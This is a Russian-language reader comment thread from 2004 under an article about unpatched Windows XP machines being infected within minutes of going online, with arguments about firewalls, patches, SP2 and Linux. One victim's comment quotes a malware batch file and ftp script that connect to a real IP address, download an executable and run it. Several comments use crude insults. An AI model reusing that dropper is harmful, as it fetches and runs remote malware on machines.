 |
 |
|
|
Место для Вашей рекламы!
|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Предыдущие публикации:| 2004-12-02 | НР анонсировала новую концепцию антивируса для серверов | |
| 2005-03-15 | ПК-зомбоиды нацеливают на кражу персональных данных |
Обсуждение и комментарии |
 |
 | нц 18 Aug 2004 2:16 PM |
| Бня какая-то. Статья была бы серьезной, если бы для чистоты эксперимента всеже поставили машины с разными системами, а не считали количество обращений. Сканирование это еще не "овладение". Всеравно что пересчитывать количество машин, проезжающих по перекрестку, в количество будущих ДТП на основе марок машин. | |
| | |
| ... 18 Aug 2004 2:35 PM |
| один прыщик - еще не сифилис | |
| | |
| ю 18 Aug 2004 3:20 PM |
| Все правильно написано. Выгода M$ была в драйверах и патчах. При подключении в интернет теперь ни патчей не загрузить ни драйверов. Вот почему Win может уйти в могилу ( "Плотью живой он в могилу живую уходит...") Ж:-))) | |
| | |
| кун4ненн54р45 18 Aug 2004 3:56 PM |
| - Какая жалость, - сказал Таф. - Я сижу в иллюзии. И теперь, раз вы сказали, что моего корабля не существует, я несомненно рухну вниз и сгорю в атмосфере. (с) Дж. Мартин | |
| | |
| Максим 18 Aug 2004 5:52 PM |
| > «Если бы организм человека занимался исправлениями > так же, как это делают компании, мы все бы давно умерли». Мегашедевр. Смеялся до слёз! | |
| | |
| Alexander S. 18 Aug 2004 7:22 PM |
| "включить Internet Connection Firewall. Последний сервисный пакет Microsoft, Windows XP Service Pack 2, сам установит такую конфигурацию, но чтобы скачать его, пользователю надо выйти в онлайн, так что он вынужден рисковать." Скачать SP2 чтобы включить firewall который всегда был в XP? Авторы рискуют своей профессиональной репутацией, давая такой совет. "не за горами тот день, когда вирус или червь выведет из строя вообще все. «Никому не хватит времени его обнаружить. Никто не успеет выпустить патчи или антивирусы и распространить их." Ну, может быть, у Айзека Азимова такое произойдёт, но не в реальной жизни. В реальной жизни люди спят, уходят на работу, приходят домой, живут в разных часовых поясах, включают-выключают компьютеры. Преположить, что червь выведет из строя все компьютеры сразу, вместе с теми что выключены, скажем, на ночь- как-то наивно. "Это означает, что патчи никак не решают всех проблем" Ничего не решает всех проблем. Ну и что теперь- пойти и застрелиться? Вы Red Hat-у скажите, что патчи не решают всех проблем, а то они в мае их более 60 штук навыпускали. Зачем старались, идиоты? "Представьте себе, что ваш организм говорит: „Гм, у меня грипп. Раньше такого никогда не было, значит я погибну”. Но этого не происходит" Представьте себе, что ваш огранизм говорит: "Гм, у меня вирус эбола. Значит я погибну". И это происходит. | |
| | |
| MrKooll 18 Aug 2004 8:11 PM |
| 2 Alexander S. Для начала не стот забывать что Windows XP "интуитивно понятная система не нуждающаяся в администрировании". Теперь попробуй поставить новенькую XP и пойти скачать обновления подключившись скажем к крупному кабельному провайдеру. Ты просто не успееш. Черви тебя найдут раньше чем ты заплатку скачаешь. Про настройки firewall не говори - это интуитивно понятная система. Во вторых от эболы не 100% смертность. И в третьих ей не так просто заразиться. Иначе людей давно бы уже не осталось. Популяция как раз и не вымират за счет разнообразия, а среди парка машин под WinXP разнообразия не наблюдается. Насчет обновления для RedHat - работают люди, уязвимости закрывают. Чем это плохо? Кроме того сравнивать количество патчей для дистрибутива и любой версии Windows просто некорректно. Тогда уже надо суммировать все патчи выпущенные Microsoft и выпущенные RedHat. | |
| | |
| Vanja 18 Aug 2004 9:04 PM |
| 2 MrKooll Объем кода никогда не свидетельствовал о качестве приложения. А теперь подумай. | |
| | |
| нц 18 Aug 2004 9:41 PM |
| Новенькая ХР скорее всего будет с внедренным СП1 или СП2, но чуть позже.Либо в магазине вам предложать взять диск с СП2, чтобы не выкачивать (бесплатно). Пиратский диск, который вы купите будет также с внедренным СП2 + какие-нибудь файрволлы и антивирусы в придачу - пиратам тоже нужны денюжки, и они регулярно обновляют диски. Про РедХат (Мандрейк, Дебиан, СуСе) - ну а сколько он продержится, пока вы будете патчи выкачивать, учитывая что они и побольше быть могут? | |
| | |
| Пострадавший - 3.141592653 mail.ru19 Aug 2004 4:08 AM |
| Пробовал отключить firewall, который всегда был в XP и примерно через 15 минут на моём компе загрузились корткие файлы в ситеиную папку и запучтился командный файл такого содержания: @echo off ftp -n -v -s:.pif smsc.exe del .pif del /F c.bat exit /y файл ".pif": open 213.137.125.94 5064 user a a binary GET smsc.exe bye файл "smsc.exe" длинной всего 4кб, затем он прописывается в реестре и начинает скачивать собственно тело троянской лошади длинной в 100кб, потом последний из файлов запускается и всё компутер зомбируется и начинает атоковать подобных себе. | |
| | |
| foxb - foxbabv.bg 19 Aug 2004 5:03 AM |
| It is true recently I've reinstall my windows and for the time i've downloaded sp's and patches somebody allready put a virus on my pc. Obligatoire i've reinstall it and first thing was to enable firewall and up to data antivirus before visiting windows update. | |
| | |
| Илья 19 Aug 2004 9:23 AM |
| Пионерам-мышевозам, тявкающим здесь по поводу линукса, хочу пояснить, что в любом дистрибутиве сразу после установки можно отключить все сетевые сервисы и спокойно обновить систему. В вымени это невозможно в принципе, это неуправляемая ОС с миллионом скрытых сервисов. | |
| | |
| Нос 19 Aug 2004 10:05 AM |
| 2Илья: "болеете"? :) | |
| | |
| xfs 19 Aug 2004 10:32 AM |
| что интересно первым слово линукс упомянул широко известный в узких кругах AS. спать он ему не дает что ли? 2Илья: ну в хр можно выключить сетевой интерфейс. правда я не пробовал ковыряется ли потом такая машинка извне. да и давно это было. а насчет дистрибутива - было у меня ядро вообще без поддержки сети. недавно подключился к прокинутой по району локалке, да модулек собрал под сетевуху. если без скриптов - пока модуль не загразишь, да интерфейс не подымешь - сетки не будет. и в любой момент драйверок выгрузить можно. дык к чему я веду, в локалке только у 10% установлены патчи на rpc. вот так вот. а мс непомешало бы сделать действительно какой то универсальный сервис не зависящий от работы остальной системы (хр ж на нт типа) для экстра патченья потому как все помнят бластер | |
| | |
| Serega 19 Aug 2004 10:48 AM |
| 2 AS: Ну для начала давайте ка сравним патчи от редхата и патчи от MS. Патчи от редхата это не только система, но так же пачти к различным другим ПО, которые можно и не ставить + патчи это не всегда закрытие багов, еще это добавление новых фишек, улучшение кода и т.п. Что такое патчи от МС - это патчи латающие дыры в самой системе, а если у меня еще куча софта не от МС???? Правильнее было бы считать патчи от RedHat и патчи от MS + другой софт. P.S. А вообще причем тут линукс, никто же не рвет на себе рубашку , доказывая что линукс продержится больше??? | |
| | |
| нц 19 Aug 2004 11:57 AM |
| Если My Network Places -> Properties -> и задисаблить коннекшены, этого не достаточно? | |
| | |
| ю 19 Aug 2004 12:10 PM |
| 2 нц : А в инет как будете выходить ( DX или патчи качать) или у вас только игрушки ? | |
| | |
| Alexander S. 19 Aug 2004 5:26 PM |
| Объясняю рвущим на себе рубашки: Я комментировал заявление "Это означает, что патчи никак не решают всех проблем". Для того и привёл пример Red Hat, который штампует сотни патчей в год. На хрена им мучиться, спросил я критиканов, если патчи не решают всех проблем? А в ответ- белый шум. | |
| | |
| Max 20 Aug 2004 3:47 AM |
| А какой дурак выходит по широкополосному подключению в Инет без маршрутизатора? Маленький такой маршрутизатор для бытовых целей стоит 50 грин. И вообще никаких проблем с потусторонними червями - если сам не пустишь. | |
| | |
| Василий Алтунин - skyrnewmail.ru 20 Aug 2004 5:23 AM |
| Когда бушевал MSBlast, почему то не слышно об эпидемиях на Линукс системах, так вот взялся я переставлять винду и почти сразу же, только машина появилась в сети, после первого окончательного запуска, я был удостоен "чести" лицезреть окно с обратным отсчетом... Поэтому 20 минут это реально, а при эпидемиях в локальных сетях и того меньше... В общем, скоро или M$ сделает что-то с безопасностью или уйдет навсегда. Достаточно будет качественно и профессионально написанного вируса... | |
| | |
| skipper 20 Aug 2004 8:51 AM |
| Почитал... Даже смешно становится. А что нельзя поставить патчи на машине физически не подключенной в сеть? Нельзя на неё поставить антивирусник и настроить брандмауэр? Большинство патчей легко можно выкачать с защищенной машины. После того, как меня пару раз посетил MSBlast, я инсталляцию только так и делаю. Что и вам рекомендую. Негде взять - ищите друзей. Иначе - будет тоскливо. Естественный отбор предполагает выживание популяции, а не индивида. | |
| | |
| plug 20 Aug 2004 9:41 AM |
| 2Alexander S. >>Я комментировал заявление "Это означает, что патчи никак не решают всех проблем". >>Для того и привёл пример Red Hat, который штампует сотни патчей в год. На хрена им мучиться, спросил я критиканов, если патчи не решают всех проблем? Так вы очень глупо прокомментировали. Даже если отвлечься от контекста, то ... Любому нормальному человеку понятно, что из фразы "'блаблашки' никак не решают _всех_ проблем" следует только то, что 'блаблашки' решают только _часть_ проблем. А вот надо ли от них из-за этого отказываться или нет, является ли их создание глупостью или это просто "частичное решение" ... ну никак не содержится в этой фразе. Понятно, что бывают такие случаи, когда "либо все, либо ничего". Если проблема не решаются полностью с помощью 'блаблашек', но есть альтернатива в виде 'бурбушек', то стОит полностью отбросить неэффективную технологию и пробовать другую. Но это далеко не всегда и не во всем. Где вы в критикуемой вами фразе отыскали "все или нечего" или призыв отказаться от патчей - непонятно. К тому же могли бы и в англоязычный оригинал заглянуть. Там эта фраза выглядит немного иначе - "This shows that patch management is not the be-all and end-all." Я не большой знаток английских идиом, но Lingvo подсказывает, что "the be-all and end-all" означает что-то типа "само важное в этом деле". ( Тогда ваши комментарии выглядели бы еще глупее - "если сами патчи не самое важное, то зачем же их кто-то выпускает" :-). Ну, а если бы вы еще не выдирали фразу из контекста... Там же явно сказано, что пробема не в том, что патчи плохи или несовевременны, а в том, что способ их доставки становится слишком опасным. Если бы их доставляли "бумажной" почтой или курьерами (понятно, что никто сейчас на это не пойдет) то и оставшаясь часть "всех проблем" была бы худо-бедно решена. Короче, вы, как это у вас часто случается, сами придумали утверждение, сами же его разоблачили. :) Что ж потом пенять на "белый шум", если вы сами его и генерируете. | |
| | |
| Пётр 20 Aug 2004 10:42 AM |
| не знаю. Когда бушевала "эпидемия" КодРеда, мы как раз активно разворачивали хостинговую площадку на W2К. И когда ставили IIS сразу "убивали" директорию scripts на сайтах и не давали прав на запись анонимному пользувателю. Ну при установке. И никакой КодРед ничего нам не нагадил. Ну не было у нас подефолту установленного IIS 5.0. Потом, когда появился urlscan, я его установил и составлял список адресов с которых идёт вирус. Но так никто ничего и не подкинул нам. Так что разруха - она в головах. | |
| | |
| plug 20 Aug 2004 10:52 AM |
| 2 Пётр: >> Так что разруха - она в головах. Так о том и речь. Если при установки IIS, для собственной безопасности его надо первым делом "обработать напильником", то ... у кого-то в головах явно что-то не то. :) | |
| | |
| Пётр 20 Aug 2004 1:17 PM |
| 2 plug. Вы устанавливали когда-нибудь массово сайты на IIS? Вы это делали с помощью напильника? Сочувствую, если да. | |
| | |
| plug 20 Aug 2004 1:22 PM |
| 2 Пётр: Да ладно, не сочувствуйте. "Массово" я никогда их не ставил. Но разговор то о том, почему вам вообще "напильник" понадобился. | |
| | |
| Василий Алтунин - skyrnewmail.ru 20 Aug 2004 1:35 PM |
| IIS Это круто, хотя нафига он нужен, ежели есть Апатч и к нему патч %) эк меня %))) В общем патчи на то и нуны что решают часть траблов. Еще не создана серьезная прога без ошибок. Я не говорю про прогу на асьме длиой в несколько байт, не помню уже скока... | |
| | |
| Пётр 20 Aug 2004 2:42 PM |
| 2 plug. Всё, вопросов к вам больше не имею. | |
| | |
| Пётр 20 Aug 2004 2:53 PM |
| и где Вы увидели в моих руках напильник? | |
| | |
| Vitaly 20 Aug 2004 3:36 PM |
| 2 Василий Алтунин >Когда бушевал MSBlast, почему то не слышно об эпидемиях на Линукс системах, так вот взялся я переставлять винду и почти сразу же, только машина появилась в сети, после первого окончательного запуска, я был удостоен "чести" лицезреть окно с обратным отсчетом... А включить файрволл встроенный вам трудно было ? Тогда надо было вызвать кого-нибудь кто умеет преставлять винду. | |
| | |
| Alexander S. 20 Aug 2004 4:59 PM |
| 2 plug, Прокомментировал как смог. Вот есть люди, которые пишут код. Люди не боги- они ошибаются. Ошибки исправляют патчами. Патчи служат для исправления найденных ошибок. Тут вдруг вываливаются "аналитики" и начинают ныть, что патчи не решают всех проблем. Тоже мне, бином Ньютона открыли! Так что, не надо работать над патчами? Нет, надо! Так что, не надо раздавать патчи через Интернет? Нет, надо! Так что, не надо устанавливать патчи? Нет, надо! Что же вы ноете, господа аналитики? >Там же явно сказано, что пробема не в том, что патчи плохи или несовевременны, а в том, что способ их доставки становится слишком опасным. Лучше всего Vitaly сказал: "А включить файрволл встроенный вам трудно было ? Тогда надо было вызвать кого-нибудь кто умеет преставлять винду." Может, вы не знаете как производить послепродажное обслуживание винды, обратитесь к тем- кто знает. Ну а те, кто знает много- у тех оно защищено ещё лучше. Придите ко мне домой, к примеру, воткните свой Windows XP компьютер с ОС (вообще не пропатченной) и без антивируса в мою локалку, и качайте патчи и сервис паки хоть до утра. Гарантирую- ни один червь вас не поимеет и ни один вирус не заразит. Объяснить- почему, или сами догадаетесь? Так что даже если появится super-страшный вирус, который вламывается в Windows XP через её включённый firewall, или крахает Windows XP с включённым firewall- как только MS выпустит патч, мои друзья придут ко мне и скачают его безопасно для себя. Правильная защита- она многоуровневая должна быть. Независимо от ОС на десктопе. Так что разруха- она таки в головах. | |
| | |
| ю 20 Aug 2004 5:00 PM |
| 2 Vitaly : > А включить файрволл встроенный вам трудно было ? < Легко. Вот только через оговоренное в статье время он выполняет недопустимую инструкцию, а дальше машина без него и много призовых вирусов! | |
| | |
| ю 20 Aug 2004 5:02 PM |
| 2 Vitaly : В догонку вирусы начинаю прибивать другие сервисы до такой степени, что включить этот "файрволл" не представляется возможным Ж:-))) | |
| | |
| ю 20 Aug 2004 5:09 PM |
| 2 Alexander S. : > Что же вы ноете, господа < Хотим чтобы работало. > Ну а те, кто знает много- у тех оно защищено ещё лучше. < К микрософт, да ? ( которые сами недавно свои серверы на другие IP переводили) > Придите ко мне домой, к примеру, воткните свой Windows XP компьютер с ОС (вообще не пропатченной) и без антивируса в мою локалку, и качайте патчи и сервис паки хоть до утра. Гарантирую- ни один червь вас не поимеет и ни один вирус не заразит. < Так я в инете на ноуте полазию и приду патчи качать уже с вирусом. "Вы еще кипятитесь ? Тогда мы идем к вам" Ж:-) | |
| | |
| Alexander S. 20 Aug 2004 5:14 PM |
| 2 ю, >Хотим чтобы работало. Так оно и работает. У нас. У вас- нет? Обращайтесь к нам. Поможем. >Так я в инете на ноуте полазию и приду патчи качать уже с вирусом. Кроме себя, родимого, вы никого в моей локалке не увидите. Хотя в Интернет выход у вас будет. Заражать вам будет некого. Разжевать? >Тогда мы идем к вам. Ко мне не зарастает народная тропа.:) >>> А включить файрволл встроенный вам трудно было ? < >через оговоренное в статье время он выполняет недопустимую инструкцию, а дальше машина без него и много призовых вирусов! Это вы нафантазировали, или таки ссылочку приведёте? | |
| | |
| Alexander S. 20 Aug 2004 5:14 PM |
| Ссылочку и цитатку, то есть. Please. | |
| | |
| Vitaly 20 Aug 2004 6:15 PM |
| 2 ю >> А включить файрволл встроенный вам трудно было ? < Легко. Вот только через оговоренное в статье время он выполняет недопустимую инструкцию, а дальше машина без него и много призовых вирусов! Кто выполняет - файрволл ? Вот просто так, на свежустановленной винде с неглючным железом и правильно установленными драйверами ? Конечно век живи - век учись, но никогда с таким не сталкивался и даже про такое не слышал... | |
| | |
| Дмитрий 20 Aug 2004 9:32 PM |
| Cтатья фуфло! Ну пропатчил я недавно свой ХР, так соединение удаленного доступа стало глючить... И ниче не могу поделать. | |
| | |
| Василий Алтунин - skyrnewmail.ru 21 Aug 2004 6:14 AM |
| Vitaly Ага и как скажите его включить??? Когда??? если сразу после первой загрузки еще не успеваешь запустить панель управления сразу идет обратный отсчет. Правда я заметил такую штуку: если нажать Reset после загрузки бласта в памяти не будт %) | |
| | |
| Василий Алтунин - skyrnewmail.ru 21 Aug 2004 6:16 AM |
| Да кстати немного не в тему но о патчах, не ставьте себе SP2 такого отстоя MS еще не выпускала, ну если не считать Windows | |
| | |
| нц 21 Aug 2004 10:20 AM |
| 2 Василий: аргументы, пжалуйста, или это мнение основанное на разговорах с пацанами во дворе? | |
| | |
| ю 21 Aug 2004 11:01 AM |
| 2 Alexander S. : > Ссылочку и цитатку, то есть. Please. < Ссылочку надо искать, хотя любой сайт по вирусам подойдет. В догонку, неужели вы думаете что на эту статью, если бы встроенный файрвол помогал, не вышла бы статья от M$, что все это вранье. Вы все считаете идиотами ? Могу скриншот конфигурации файрвола показать после заражения ( это моя домашняя машина) а также Event log. Там все написано, дадите свой email, могу лог прислать и сами вирусы ( ехе файлы из System и System32) | |
| | |
| Graum - 44100inbox.ru 21 Aug 2004 11:10 AM |
| 2Илья: Когда последний раз Маздай запускали, похоже никогда... 2All: А что действительно, закрытые порты на выходе уже не помогают. Или речь идет все же о user'ax | |
| | |
| ю 21 Aug 2004 11:10 AM |
| 2 Alexander S. : > Обращайтесь к нам. Поможем. < Тебе надо M$ помочь, зачем мне. А то они неграмотные, вдруг вы их вразумите, научите как правильно все делать. > Кроме себя, родимого, вы никого в моей локалке не увидите. < То есть ваша "локалка" кроме инета ничего не содержит, ни MSSQL, ни Oracle. Это похоже на какое то интернет кафе. Ничего серьезного. Я вам тоже могу посоветовать способ защиты от вирусов для M$. Все виндузятники выстраиваются в цепь, начиная с БГ и занимаются передачей SP2 ( из рук в руки), сеть замените дисками и тогда да, никакие вирусы M$ не страшны! | |
| | |
| Hoc 21 Aug 2004 2:19 PM |
| Alexander.S : чё ты ту распинаешься, вокруг столько леммингов которые только-что купив комп лезут сразу в интернет, но самое противное что комп покупают у других леммингов. Если бы Windows давали уже настроенным и со всеми патчами проблем бы было меньше. На самом деле это политика Microsoft дала бумерангом. | |
| | |
| Волонтер 23 Aug 2004 3:50 PM |
| 2 Нос: > Если бы Windows давали уже настроенным и со всеми патчами > проблем бы было меньше. Лучше сразу в ПЗУ каждого компа прошивать. | |
| | |
| лемминг 23 Aug 2004 4:09 PM |
| 2Нос: а вот и нет. компьютер твоей мечты, настроенный и с патчами давно в продаже. про XBox слышал? | |
| | |
| glassy 24 Aug 2004 9:04 AM |
| То есть по-вашему я сделал большую глупость, что в воскресенье поставил себе mdk 10 без апдейтов и с тех пор в инете со статическим IP? | |
| | |
| Siizz 10 Sep 2004 12:52 PM |
| Все любят файрфоллы... Вот только лазаите по инету - открывая свои порты... Спуфинга XP боятся - потому лазают винды где попало... Винды говорилось - админить не надо - но выходит так что надо... Не проще ли поставить себе нормальный Linux? По любому понимать программы нужно, но у Виндов все закрыто, одни еррор коды... Конечно, можно облазить много M$ сайтов, потратить кучу времени, накачать (купить) касперских, атгардов или Оутпостов, выкачивать паки по 100-200 метров... Работать будет. НО в линуксе все это есть, с документацией и детальным описанием. Никто ни бьет кулаком в грудь о том что все просто, но все честно и открыто. А средства удаленного администрирования - обыденность, 5 минут - любая клиентская машина - что ваше рабочее место. Никто ни говорит что Линукс лучше... Он честнее. | |
| | |
| Всем пиздоболам по еблу 28 Apr 2007 7:52 PM |
| Пиздеш, в школу ПОХОДИ.... | |
| | |
| ← июль 2004 | 14 15 16 17 18 19 20 22 23 | сентябрь 2004 → |
Место для Вашей рекламы!